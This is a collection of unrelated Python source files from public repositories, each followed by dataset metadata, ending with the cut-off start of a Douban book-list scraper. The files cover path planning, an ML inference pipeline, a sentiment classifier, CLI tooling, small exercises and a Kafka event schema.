:return: list of nearby vertices\n \"\"\"\n return self.trees[tree].V.nearest(x, num_results=n, objects=\"raw\")\n\n def get_nearest(self, tree, x):\n \"\"\"\n Return vertex nearest to x\n :param tree: int, tree being searched\n :param x: tuple, vertex around which searching\n :return: tuple, nearest vertex to x\n \"\"\"\n return next(self.nearby(tree, x, 1))\n\n def new_and_near(self, tree, q):\n \"\"\"\n Return a new steered vertex and the vertex in tree that is nearest\n :param tree: int, tree being searched\n :param q: length of edge when steering\n :return: vertex, new steered vertex, vertex, nearest vertex in tree to new vertex\n \"\"\"\n x_rand = self.X.sample_free()\n x_nearest = self.get_nearest(tree, x_rand)\n x_new = self.bound_point(steer(x_nearest, x_rand, q[0]))\n # check if new point is in X_free and not already in V\n if not self.trees[0].V.count(x_new) == 0 or not self.X.obstacle_free(x_new):\n return None, None\n self.samples_taken += 1\n return x_new, x_nearest\n\n def connect_to_point(self, tree, x_a, x_b):\n \"\"\"\n Connect vertex x_a in tree to vertex x_b\n :param tree: int, tree to which to add edge\n :param x_a: tuple, vertex\n :param x_b: tuple, vertex\n :return: bool, True if able to add edge, False if prohibited by an obstacle\n \"\"\"\n if self.trees[tree].V.count(x_b) == 0 and self.X.collision_free(x_a, x_b, self.r):\n self.add_vertex(tree, x_b)\n self.add_edge(tree, x_b, x_a)\n return True\n return False\n\n def can_connect_to_goal(self, tree):\n \"\"\"\n Check if the goal can be connected to the graph\n :param tree: rtree of all Vertices\n :return: True if can be added, False otherwise\n \"\"\"\n x_nearest = self.get_nearest(tree, self.x_goal)\n if self.x_goal in self.trees[tree].E and x_nearest in self.trees[tree].E[self.x_goal]:\n # tree is already connected to goal using nearest vertex\n return True\n if self.X.collision_free(x_nearest, self.x_goal, self.r): # check if obstacle-free\n return True\n return False\n\n def get_path(self):\n \"\"\"\n Return path through tree from start to goal\n :return: path if possible, None otherwise\n \"\"\"\n if self.can_connect_to_goal(0):\n print(\"Can connect to goal\")\n self.connect_to_goal(0)\n return self.reconstruct_path(0, self.x_init, self.x_goal)\n print(\"Could not connect to goal\")\n return None\n\n def connect_to_goal(self, tree):\n \"\"\"\n Connect x_goal to graph\n (does not check if this should be possible, for that use: can_connect_to_goal)\n :param tree: rtree of all Vertices\n \"\"\"\n x_nearest = self.get_nearest(tree, self.x_goal)\n self.trees[tree].E[self.x_goal] = x_nearest\n\n def reconstruct_path(self, tree, x_init, x_goal):\n \"\"\"\n Reconstruct path from start to goal\n :param tree: int, tree in which to find path\n :param x_init: tuple, starting vertex\n :param x_goal: tuple, ending vertex\n :return: sequence of vertices from start to goal\n \"\"\"\n path = [x_goal]\n current = x_goal\n if x_init == x_goal:\n return path\n while not self.trees[tree].E[current] == x_init:\n path.append(self.trees[tree].E[current])\n current = self.trees[tree].E[current]\n path.append(x_init)\n path.reverse()\n return path\n\n def check_solution(self):\n # probabilistically check if solution found\n if self.prc and random.random() < self.prc:\n print(\"Checking if can connect to goal at\", str(self.samples_taken), \"samples\")\n path = self.get_path()\n if path is not None:\n return True, path\n # check if can connect to goal after generating max_samples\n if self.samples_taken >= self.max_samples:\n return True, self.get_path()\n return False, None\n\n def bound_point(self, point):\n # if point is out-of-bounds, set to bound\n point = np.maximum(point, self.X.dimension_lengths[:, 0])\n point = np.minimum(point, self.X.dimension_lengths[:, 1])\n return tuple(point)\n","repo_name":"motion-planning/rrt-algorithms","sub_path":"src/rrt/rrt_base.py","file_name":"rrt_base.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":459,"dataset":"github-code","pt":"72"} +{"seq_id":"15786646201","text":"\n\n\"\"\"A pipeline that uses RunInference API to perform object detection.\"\"\"\n\nimport argparse\nimport io\nimport logging\nimport json\nfrom typing import Iterable\nfrom typing import Tuple\nfrom typing import Mapping\nfrom typing import Any\nfrom typing import Dict\n\nimport apache_beam as beam\nimport torch\nfrom apache_beam.io.filesystems import FileSystems\nfrom apache_beam.ml.inference.base import KeyedModelHandler\nfrom apache_beam.ml.inference.base import PredictionResult\nfrom apache_beam.ml.inference.base import RunInference\nfrom apache_beam.ml.inference.pytorch_inference import PytorchModelHandlerTensor\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.options.pipeline_options import SetupOptions\nfrom apache_beam.options.pipeline_options import GoogleCloudOptions\nfrom apache_beam.runners.runner import PipelineResult\nfrom PIL import Image\nfrom torchvision import models\nfrom torchvision import transforms\n\n\ndef read_image(project_id: str, element: Dict[str, str]) -> Tuple[str, Image.Image]:\n image_file_name = f\"gs://{project_id}-dataflow-ml-ad/{element['filename']}\"\n with FileSystems().open(image_file_name, 'r') as file:\n image_data = Image.open(io.BytesIO(file.read())).convert('RGB')\n return element['filename'], image_data\n\n\ndef preprocess_image(image_data: Image.Image) -> torch.Tensor:\n # remove .cuda() if you run this pipeline without GPU\n transform = transforms.ToTensor()\n return transform(image_data).cuda()\n\n\nclass PostProcessor(beam.DoFn):\n LABELS = [\"\", \"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\", \"fire hydrant\", \"street sign\", \"stop sign\", \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"hat\", \"backpack\", \"umbrella\", \"shoe\", \"eye glasses\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\", \"baseball glove\", \"skateboard\", \"surfboard\", \"tennis racket\", \"bottle\", \"plate\", \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\", \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\", \"bed\", \"mirror\", \"dining table\", \"window\", \"desk\", \"toilet\", \"door\", \"tv\", \"laptop\", \"mouse\", \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\", \"blender\", \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\", \"hair brush\"]\n\n def process(self, element: Tuple[str, PredictionResult]) -> Iterable[Dict]:\n filename, prediction_result = element\n prediction = prediction_result.inference\n for bbox, label, score in zip(prediction['boxes'].cpu().detach().numpy(),\n prediction['labels'].cpu().detach().numpy(),\n prediction['scores'].cpu().detach().numpy()):\n yield ({'filename': filename,\n 'bbox': json.dumps([float(x) for x in bbox]),\n 'label_id': int(label),\n 'label': self.LABELS[int(label)],\n 'score': float(score)})\n\n\ndef parse_known_args(argv):\n \"\"\"Parses args for the workflow.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--model_state_dict_path',\n dest='model_state_dict_path',\n required=True,\n help=\"Path to the model's state_dict.\")\n return parser.parse_known_args(argv)\n\n\ndef run(\n argv=None,\n save_main_session=True) -> PipelineResult:\n \"\"\"\n Args:\n argv: Command line arguments defined for this example.\n save_main_session: Used for internal testing.\n \"\"\"\n known_args, pipeline_args = parse_known_args(argv)\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n gc_options = pipeline_options.view_as(GoogleCloudOptions)\n\n model_class = models.detection.fasterrcnn_resnet50_fpn\n model_params = {'num_classes': 91}\n\n # In this example we pass keyed inputs to RunInference transform.\n # Therefore, we use KeyedModelHandler wrapper over PytorchModelHandler.\n model_handler = PytorchModelHandlerTensor(\n state_dict_path=known_args.model_state_dict_path,\n model_class=model_class,\n model_params=model_params,\n device='GPU')\n\n # override batch_elements_kwargs to change min/max batch size\n def batch_elements_kwargs_() -> Mapping[str, Any]:\n return {'min_batch_size':10, 'max_batch_size':10}\n model_handler.batch_elements_kwargs = batch_elements_kwargs_\n\n\n query = f\"\"\"\n SELECT\n filename\n FROM\n `{gc_options.project}.dfdemo.interpolated`\n WHERE\n frame_id = 'center_camera'\n ORDER BY\n timestamp\n \"\"\"\n table_schema = \"filename:STRING, bbox:STRING, label_id:NUMERIC, label:STRING, score:FLOAT64\"\n\n pipeline = beam.Pipeline(options=pipeline_options)\n filename_value_pair = (\n pipeline\n | 'ReadImageNames' >> beam.io.ReadFromBigQuery(\n project=gc_options.project, use_standard_sql=True, query=query)\n | 'ReadImageData' >> beam.Map(\n lambda element: read_image(gc_options.project, element))\n | 'PreprocessImages' >> beam.MapTuple(\n lambda image_file_name, image_data: (image_file_name, preprocess_image(image_data))))\n predictions = (\n filename_value_pair\n | 'PyTorchRunInference' >> RunInference(KeyedModelHandler(model_handler))\n | 'ProcessOutput' >> beam.ParDo(PostProcessor()))\n predictions | \"WriteToBigQuery\" >> beam.io.WriteToBigQuery(\n f\"{gc_options.project}:dfdemo.inference\",\n project=gc_options.project,\n schema=table_schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED)\n\n result = pipeline.run()\n return result\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()","repo_name":"hayatoy/dataflow-ml-ad","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25168387040","text":"\"\"\"\n Train a logistic regresion model for document classification.\n\n Search this file for the keyword \"Hint\" for possible areas of\n improvement. There are of course others.\n\"\"\"\n\nimport pandas as pd\nimport pickle\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Hint: These are not actually used in the current \n# pipeline, but would be used in an alternative \n# tokenizer such as PorterStemming.\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nstop = stopwords.words('english')\n\n\"\"\"\n This is a very basic tokenization strategy. \n \n Hint: Perhaps implement others such as PorterStemming\n Hint: Is this even used? Where would you place it?\n\"\"\"\ndef tokenizer(text):\n return text.split()\n\n# Read in the dataset and store in a pandas dataframe\ndf = pd.read_csv('./training_movie_data.csv')\n\n# Split your data into training and test sets.\n# Allows you to train the model, and then perform\n# validation to get a sense of performance.\n# \n# Hint: This might be an area to change the size\n# of your training and test sets for improved \n# predictive performance.\ntraining_size = 40000\nX_train = df.loc[:training_size, 'review'].values\ny_train = df.loc[:training_size, 'sentiment'].values\nX_test = df.loc[training_size:, 'review'].values\ny_test = df.loc[training_size:, 'sentiment'].values\n\n# Perform feature extraction on the text.\n# Hint: Perhaps there are different preprocessors to\n# test? \ntfidf = TfidfVectorizer(strip_accents=None,\n lowercase=False,\n preprocessor=None)\n\n# Hint: There are methods to perform parameter sweeps to find the\n# best combination of parameters. Look towards GridSearchCV in \n# sklearn or other model selection strategies.\n\n# Create a pipeline to vectorize the data and then perform regression.\n# Hint: Are there other options to add to this process?\n# Look to documentation on Regression or similar methods for hints.\n# Possibly investigate alternative classifiers for text/sentiment.\nlr_tfidf = Pipeline([('vect', tfidf),\n ('clf', LogisticRegression(C=0.001,fit_intercept=False,penalty='l1',random_state=0))])\n\n# Train the pipline using the training set.\nlr_tfidf.fit(X_train, y_train)\n\n# Print the Test Accuracy\nprint('Test Accuracy: %.3f' % lr_tfidf.score(X_test, y_test))\n\n# Save the classifier for use later.\npickle.dump(lr_tfidf, open(\"saved_model.sav\", 'wb'))\n","repo_name":"mattie-mcp/ai","sub_path":"sentiment-analysis/basic_sentiment_pipeline.py","file_name":"basic_sentiment_pipeline.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10416163323","text":"\"\"\"Implementation of varfish-cli subcommand \"cases *\".\"\"\"\n\nimport typing\nimport uuid\n\nimport typer\n\nfrom varfish_cli import api, common\nfrom varfish_cli.cli.common import ListObjects, RetrieveObject\nfrom varfish_cli.common import OutputFormat\n\n#: Default fields for projects.\nDEFAULT_FIELDS_CASE: typing.Dict[OutputFormat, typing.Optional[typing.Tuple[str, ...]]] = {\n OutputFormat.TABLE.value: (\"sodar_uuid\", \"name\", \"index\", \"members\"),\n OutputFormat.CSV.value: None,\n OutputFormat.JSON.value: None,\n}\n\n#: The ``Typer`` instance to use for the ``cases`` sub command.\napp = typer.Typer(no_args_is_help=True)\n\n\n@app.command(\"case-list\")\ndef cli_case_list(\n ctx: typer.Context,\n project_uuid: typing.Annotated[\n uuid.UUID, typer.Argument(..., help=\"UUID of project to list cases for\")\n ],\n output_file: typing.Annotated[\n str, typer.Option(\"--output-file\", help=\"Path to file to write to\")\n ] = \"-\",\n output_format: typing.Annotated[\n OutputFormat, typer.Option(\"--output-format\", help=\"Output format\")\n ] = OutputFormat.TABLE.value,\n output_delimiter: typing.Annotated[\n str, typer.Option(\"--output-delimiter\", help=\"Delimiter for CSV output\")\n ] = \",\",\n output_fields: typing.Annotated[\n typing.Optional[typing.List[str]], typer.Option(\"--output-fields\", help=\"Output fields\")\n ] = None,\n):\n \"\"\"List all Case entries for the\"\"\"\n common_options: common.CommonOptions = ctx.obj\n\n list_objects = ListObjects(api.Case)\n return list_objects.run(\n common_options=common_options,\n callable=api.case_list,\n output_file=output_file,\n output_format=output_format,\n output_delimiter=output_delimiter,\n output_fields=output_fields,\n parent_uuid=project_uuid,\n default_fields=DEFAULT_FIELDS_CASE,\n )\n\n\n@app.command(\"case-retrieve\")\ndef cli_case_retrieve(\n ctx: typer.Context,\n object_uuid: typing.Annotated[\n uuid.UUID, typer.Argument(..., help=\"UUID of the object to retrieve\")\n ],\n output_file: typing.Annotated[\n str, typer.Option(\"--output-file\", help=\"Path to file to write to\")\n ] = \"-\",\n):\n \"\"\"Retrieve Case by UUID\"\"\"\n common_options: common.CommonOptions = ctx.obj\n\n retrieve_object = RetrieveObject(api.Case)\n return retrieve_object.run(\n common_options=common_options,\n callable=api.case_retrieve,\n key_name=\"case_uuid\",\n object_uuid=object_uuid,\n output_file=output_file,\n )\n","repo_name":"bihealth/varfish-cli","sub_path":"varfish_cli/cli/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26255886695","text":"#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\r\nfrom time import clock\r\nimport urllib.request as urllib\r\nimport sys, os\r\n\r\n\r\n\r\ndic = {\t'á':'a', 'à':'a', 'ã':'a',\r\n\t\t'é':'e', 'è':'e', 'ê':'e',\r\n\t\t'í':'i',\r\n\t\t'ó':'o', 'õ':'o', 'ô':'o',\r\n\t\t'ú':'u'}\r\n\r\n\r\ndef reporthook(blocknum, blocksize, totalsize):\r\n readsofar = blocknum * blocksize\r\n if totalsize > 0:\r\n percent = readsofar * 1e2 / totalsize\r\n n = '#' * int(30 * percent / 100)\r\n s = \"\\r %*.2f KB |%-30s| %5.1f%% / %5.2f KB\" % (len(str(totalsize)), readsofar / 1024, n, percent, totalsize / 1024)\r\n sys.stderr.write(s)\r\n if readsofar >= totalsize: # near the end\r\n sys.stderr.write(\"\\n\")\r\n else: # total size is unknown\r\n sys.stderr.write(\"read %d\\n\" % (readsofar,))\r\n\r\n\r\ndef readWords(url):\t\r\n\tif not os.path.exists('data.db'):\r\n\t\tprint(\"~Carregando banco de palavras~\")\r\n\t\tpage = urllib.urlretrieve(url, 'data.db', reporthook)\r\n\twith open('data.db', 'r', encoding = 'iso8859') as db:\r\n\t\twords = db.read()\r\n\r\n\tif len(words) == 0:\r\n\t\tos.remove('data.db')\r\n\t\treturn readWords(url)\r\n\r\n\treturn words.split()\r\n\r\ndef cleanWords(words):\r\n\tglobal dic\r\n\ti = 0\r\n\twhile i < len(words):\r\n\t\tlow = words[i].lower()\r\n\t\twords[i] = low\r\n\t\tnew = ''\r\n\t\tfor c in words[i]:\r\n\t\t\tif c in dic:\r\n\t\t\t\tnew += dic[c]\r\n\t\t\telse:\r\n\t\t\t\tnew += c\r\n\t\twords[i] = new\r\n\t\ti += 1\r\n\treturn words","repo_name":"ryukinix/pyzumbi-amazon","sub_path":"exercícios/EPs/forca/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7371486915","text":"import http.client\nimport xml.etree.ElementTree as ET\n\n\ndef get_session_code():\n\n conn = http.client.HTTPConnection(\"172.24.183.26:9763\")\n\n payload = \"\\r\\n \" \\\n \"Tape Test Application\\r\\n \" \\\n \"1\\r\\n \" \\\n \"1\\r\\n\" \\\n \"\"\n\n headers = {\n 'content-type': \"application/xml\",\n 'accept': \"application/xml\"\n }\n\n conn.request(\"POST\", \"/services/DIVArchiveWS_REST_2.1/registerClient\", payload, headers)\n\n res = conn.getresponse()\n data = res.read()\n\n# clientcode = xmltodict.parse(data.decode('UTF8'))\n\n root = ET.fromstring(data.decode('UTF8'))\n sessioncode = root[0].text\n\n print(sessioncode)\n return sessioncode\n\nif __name__ == '__main__':\n get_session_code()\n\n\n\n","repo_name":"polython/DIVA_Web_Interface","sub_path":"sescode.py","file_name":"sescode.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73965670314","text":"from export_zinc_ids import get_info_zincid\nimport sys, subprocess, os\n\ninfn = sys.argv[1]\n\nlegacy_targets = [\n\"/nfs/exb/zinc22/export/deprecated/ZINC_21Q2\",\n\"/nfs/exb/zinc22/export/deprecated/2d-09\",\n\"/nfs/exb/zinc22/export/deprecated/2d-10\",\n\"/nfs/exb/zinc22/export/deprecated/2d-01\",\n\"/nfs/exb/zinc22/export/deprecated/2d-11\",\n\"/nfs/exb/zinc22/export/deprecated/2d-12-diff/2d/finished\"]\ncurr_buffer = []\ncurr_hac = None\ncurr_tranche = None\n\noutbuffer = open('result', 'w')\n\ndef check_targets(curr_buffer, outbuffer, tranche, hac):\n\tfor target in legacy_targets:\n\t\tprint(target, curr_tranche, curr_buffer)\n\t\tif len(curr_buffer) == 0:\n\t\t\tbreak\n\t\ttfile = os.path.join(target, curr_hac, curr_tranche)\n\t\tif os.path.exists(tfile + '.smi'):\n\t\t\ttfile = tfile + '.smi'\n\t\t\tg = \"grep\"\n\t\telif os.path.exists(tfile + '.smi.gz'):\n\t\t\ttfile = tfile + '.smi.gz'\n\t\t\tg = \"zgrep\"\n\t\telse:\n\t\t\tcontinue\n\t\twith subprocess.Popen([g, \"-E\", '|'.join(curr_buffer), tfile], stdout=subprocess.PIPE) as spt:\n\t\t\tfor line in spt.stdout:\n\t\t\t\tf1, f2 = line.decode('utf-8').strip().split()\n\t\t\t\tif f1.startswith(\"ZINC\"):\n\t\t\t\t\tzincid = f1\n\t\t\t\t\tsmiles = f2\n\t\t\t\telse:\n\t\t\t\t\tzincid = f2\n\t\t\t\t\tsmiles = f1\n\t\t\t\tprint(zincid, smiles)\n\t\t\t\toutbuffer.write('\\t'.join([zincid, smiles]) + '\\n')\n\t\t\t\t#outbuffer.append('\\t'.join([zincid, smiles]))\n\t\t\t\ttry: # if there's a duplicate there may be an error in this .remove statement\n\t\t\t\t\tcurr_buffer.remove(zincid)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\nwith open(infn, 'r') as inf:\n\tlines = sorted([l.strip() for l in inf.readlines()])\n\tprint(lines[0:10])\n\tfor line in lines:\n\t\tprint(line)\n\t\ttranche, sub_id = get_info_zincid(line)\n\t\thac = tranche[:3]\n\t\tif tranche != curr_tranche:\n\t\t\tcheck_targets(curr_buffer, outbuffer, curr_tranche, curr_hac)\n\t\t\tif len(curr_buffer) != 0:\n\t\t\t\tprint(\"unable to find: {}\".format(curr_buffer))\n\t\t\tcurr_tranche = tranche\n\t\t\tcurr_hac = hac\n\t\t\tcurr_buffer = [line]\n\t\telse:\n\t\t\tcurr_buffer.append(line)\ncheck_targets(curr_buffer, outbuffer, curr_tranche, curr_hac)\n\noutbuffer.close()\n#with open(\"result\", 'w') as resf:\n#\tfor res in outbuffer:\n#\t\tresf.write(res + '\\n')\n","repo_name":"docking-org/zinc22-2d","sub_path":"utils-2d/tin/misc/comb_legacy_files.py","file_name":"comb_legacy_files.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70086055272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 11:25:50 2020\n\n@author: repa\n\"\"\"\nfrom numpy import zeros, array, sqrt, exp, float32\nfrom numpy.random import normal\nimport base64\n\nclass WindModel:\n def __init__(self, vx: float, vy: float, var: float, tau: float=100.0) -> None:\n '''\n Create a wind model, with varying wind\n\n Parameters\n ----------\n vx : float\n Average wind, x / northing direction.\n vy : float\n Average wind, y / easting direction.\n var : float\n Standard deviation of variation process.\n tau : float\n Normalized fime constant of variation process.\n\n Returns\n -------\n None\n \n '''\n self.vbase = array((vx, vy), dtype=float32)\n self.vvar = self.vbase.copy()\n self.var = var / sqrt(0.5/tau)\n self.psi = 1.0 - exp(-1.0/tau)\n self.message = 'E'.encode('ascii') + base64.b64encode(self.vvar)\n \n def update(self):\n '''\n Update step of the wind, returns array with current wind\n\n Returns\n -------\n array of float (copied!).\n\n '''\n self.vvar += -self.psi * self.vvar + \\\n self.psi * normal(loc=self.vbase, scale=self.var)\n self.message = 'E'.encode('ascii') + base64.b64encode(self.vvar)\n return self.vvar\n \nif __name__ == '__main__':\n \n from numpy import std\n import matplotlib.pyplot as plt\n \n vxy1 = []\n vxy2 = []\n \n wind = WindModel(5, 1, 0.5, 100)\n for i in range(1000):\n vxy1.append(wind.update().copy())\n vxy1 = array(vxy1)\n \n wind = WindModel(5, 1, 0.5, 10)\n for i in range(1000):\n vxy2.append(wind.update().copy())\n vxy2 = array(vxy2)\n \n f = plt.figure()\n plt.subplot(211)\n plt.plot(vxy1[:,0])\n plt.plot(vxy1[:,1])\n\n plt.subplot(212)\n plt.plot(vxy2[:,0])\n plt.plot(vxy2[:,1])\n\n print(f'var 1 x {std(vxy1[:,0])} y {std(vxy1[:,1])}')\n print(f'var 2 x {std(vxy2[:,0])} y {std(vxy2[:,1])}')\n ","repo_name":"leochien1110/iceboat_project","sub_path":"windmodel.py","file_name":"windmodel.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41565559104","text":"import LT16_module1\r\n\r\nfrom LT16_module1 import employee as ep, technical_employee as tep\r\n\r\n\r\nemp=ep(first_name='Smruti',last_name='Ranjan',month_pay=50000)\r\n\r\nemp.email()\r\nprint(emp.emailid)\r\n\r\n\r\ntech_emp=tep('Vijay','Sharma',50000,\"python\")\r\ntech_emp.email()\r\nprint(tech_emp.emailid)\r\n","repo_name":"DeepHobbying/BasicsofPython","sub_path":"LT16_module2.py","file_name":"LT16_module2.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40639163368","text":"import json\nfrom dataclasses import dataclass\nfrom dataclasses_jsonschema import JsonSchemaMixin\nfrom pprint import pprint\n\nBOOTSTRAP_SERVERS = ''\nEVENTS_TO_PRODUCE = 10\n\nwith open('wikiLangs.json', 'r', encoding=\"utf8\") as f:\n language_codes = json.load(f)\n\nfrom urllib.parse import urlparse, parse_qs\n\n\nTOPIC_URLs = {'recentchange': \"https://stream.wikimedia.org/v2/stream/mediawiki.recentchange\",\n 'revision' : \"https://stream.wikimedia.org/v2/stream/mediawiki.page-create\"}\n\n\n# JsonSchemaMixin\n@dataclass\nclass WikiEvent():\n # Url: str\n PageTitle: str\n IsBot: bool\n UserName: str\n Date: str\n # Timestamp: int\n Lang: str = \"English\"\n # Comment: str = \"\"\n Type: str = \"\"\n IsRevert: bool = False\n RevertDetails: bool = \"\"\n\n def __init__(self, eventId, event, topic_url):\n url = event['meta']['uri']\n if topic_url == TOPIC_URLs['recentchange']:\n self.Type = event['type']\n # self.Url = url\n self.PageTitle = event['title']\n self.IsBot = event['bot']\n self.UserName = event['user']\n # self.Comment = event.get('comment', \"\")\n # self.Timestamp = eventId[0]['timestamp']\n self.Date = event['meta']['dt']\n self.Lang = next((language_codes[code] for code in language_codes if code in urlparse(url).netloc), self.Lang)\n\n elif topic_url == TOPIC_URLs['revision']:\n # self.Url = url\n self.PageTitle = event['page_title']\n self.IsBot = event['performer']['user_is_bot']\n self.UserName = event['performer']['user_text']\n self.IsRevert = event.get('rev_is_revert', False)\n self.RevertDetails = event.get('rev_revert_details', \"\")\n # self.Comment = event.get('comment', \"\")\n # self.Timestamp = eventId[0]['timestamp']\n self.Date = event['meta']['dt']\n self.Lang = next((language_codes[code] for code in language_codes if code in urlparse(url).netloc), self.Lang)\n\n def toJSON(self):\n return json.dumps(self.__dict__, sort_keys=True, indent=4).encode('utf-8')\n \n\nif __name__ == \"__main__\":\n pprint(WikiEvent.json_schema())\n\n\n\n\n\n\n","repo_name":"LahavPadan/WikiMedia-Events-KafkaStreams-App","sub_path":"wikipedia-statistics/src/main/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5571772012","text":"linha = input().split()\nterm1 = linha[0]\nterm2 = linha[1]\n\nwhile not(term1 == '0' and term2 == '0'):\n t1 = int(term1)\n t2 = int(term2)\n charsT1 = []\n charsT2 = []\n tamT1 = len(term1)\n tamT2 = len(term2)\n somador = 0\n if tamT1 > tamT2:\n qtdZeros = tamT1-tamT2\n cont = 0\n while cont < qtdZeros:\n charsT2.append('0')\n cont += 1\n if tamT1 < tamT2:\n qtdZeros = tamT2-tamT1\n cont = 0\n while cont < qtdZeros:\n charsT1.append('0')\n cont += 1\n #print(tamT1,tamT2)\n for c in term1:\n charsT1.append(c)\n for c in term2:\n charsT2.append(c)\n anterior = 0\n #print('len(charsT1)',len(charsT1))\n for index in range(len(charsT1)-1,-1,-1):\n #print('index',index)\n #print(charsT1[index], charsT2[index])\n #print('anterior',anterior)\n if len(str(anterior)) > 1:\n anterior == anterior[0]\n #print('anterior[0]',anterior[0])\n soma = int(charsT1[index])+int(charsT2[index])+int(anterior[0])\n else:\n soma = int(charsT1[index])+int(charsT2[index])\n #print('soma',soma)\n if soma >= 10:\n anterior = str(soma)\n somador += 1\n #print('flag')\n else:\n anterior = str(soma)\n #print(len(charsT1),len(charsT2))\n #print(charsT1,charsT2)\n if somador == 0:\n print('No carry operation.')\n if somador == 1:\n print('1 carry operation.')\n if somador > 1:\n print(str(somador)+' carry operations.')\n linha = input().split()\n term1 = linha[0]\n term2 = linha[1]\n","repo_name":"Nyon0k/TEP","sub_path":"Lista4/c10035.py","file_name":"c10035.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13545760528","text":"import difflib\nimport re\nfrom typing import Any\n\nfrom schema_salad.utils import json_dumps\n\n\nclass JsonDiffMatcher:\n \"\"\"Raise AssertionError with a readable JSON diff when not __eq__().\n\n Used with assert_called_with() so it's possible for a human to see\n the differences between expected and actual call arguments that\n include non-trivial data structures.\n \"\"\"\n\n def __init__(self, expected: Any):\n self.expected = expected\n\n def __eq__(self, actual: Any) -> bool:\n expected_json = json_dumps(self.expected, sort_keys=True, indent=2)\n actual_json = json_dumps(actual, sort_keys=True, indent=2)\n if expected_json != actual_json:\n raise AssertionError(\n \"\".join(\n difflib.context_diff(\n expected_json.splitlines(True),\n actual_json.splitlines(True),\n fromfile=\"Expected\",\n tofile=\"Actual\",\n )\n )\n )\n return True\n\n\ndef StripYAMLComments(yml: str) -> Any:\n return re.sub(r\"(?ms)^(#.*?\\n)*\\n*\", \"\", yml)\n","repo_name":"common-workflow-language/schema_salad","sub_path":"schema_salad/tests/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"26050873725","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : douban.py\r\n@Time : 2021/02/18\r\n@Author : HDUZN\r\n@Version : 2.0\r\n@Contact : hduzn@vip.qq.com\r\n@License : (C)Copyright 2021-2022\r\n@Desc : 将Douban 读过的书的记录保存到douban.xlsx 文件和数据库中\r\n (注:豆瓣标记后,没写标签、没评分/星 会报错,没写评论没关系。)\r\n 更新于2022/05/12,采用selenium4版本,跳过selenium的webdriver检测\r\n'''\r\n\r\n# here put the import lib\r\nimport douban_config, z_db\r\nimport time, os, re\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nimport openpyxl\r\n\r\n# 获取最大页数和每一页的模板链接\r\ndef get_max_page_num(wd):\r\n num_element = wd.find_element(By.XPATH, '//div[@class=\"paginator\"]/a[last()]')\r\n max_page_num = int(num_element.text) # 21\r\n site = num_element.get_attribute('href')\r\n # num_site_list = [max_page_num, site]\r\n return [max_page_num, site]\r\n\r\n# 获取所有页数的链接List\r\ndef get_page_site_list(max_page_num, model_site):\r\n # model_site: https://book.douban.com/people/[id]/collect?start=300&sort=time&rating=all&filter=all&mode=grid\r\n cop = '[0-9]'\r\n site_part2 = ''.join(re.findall(cop, model_site)) # '300'\r\n site_part1 = 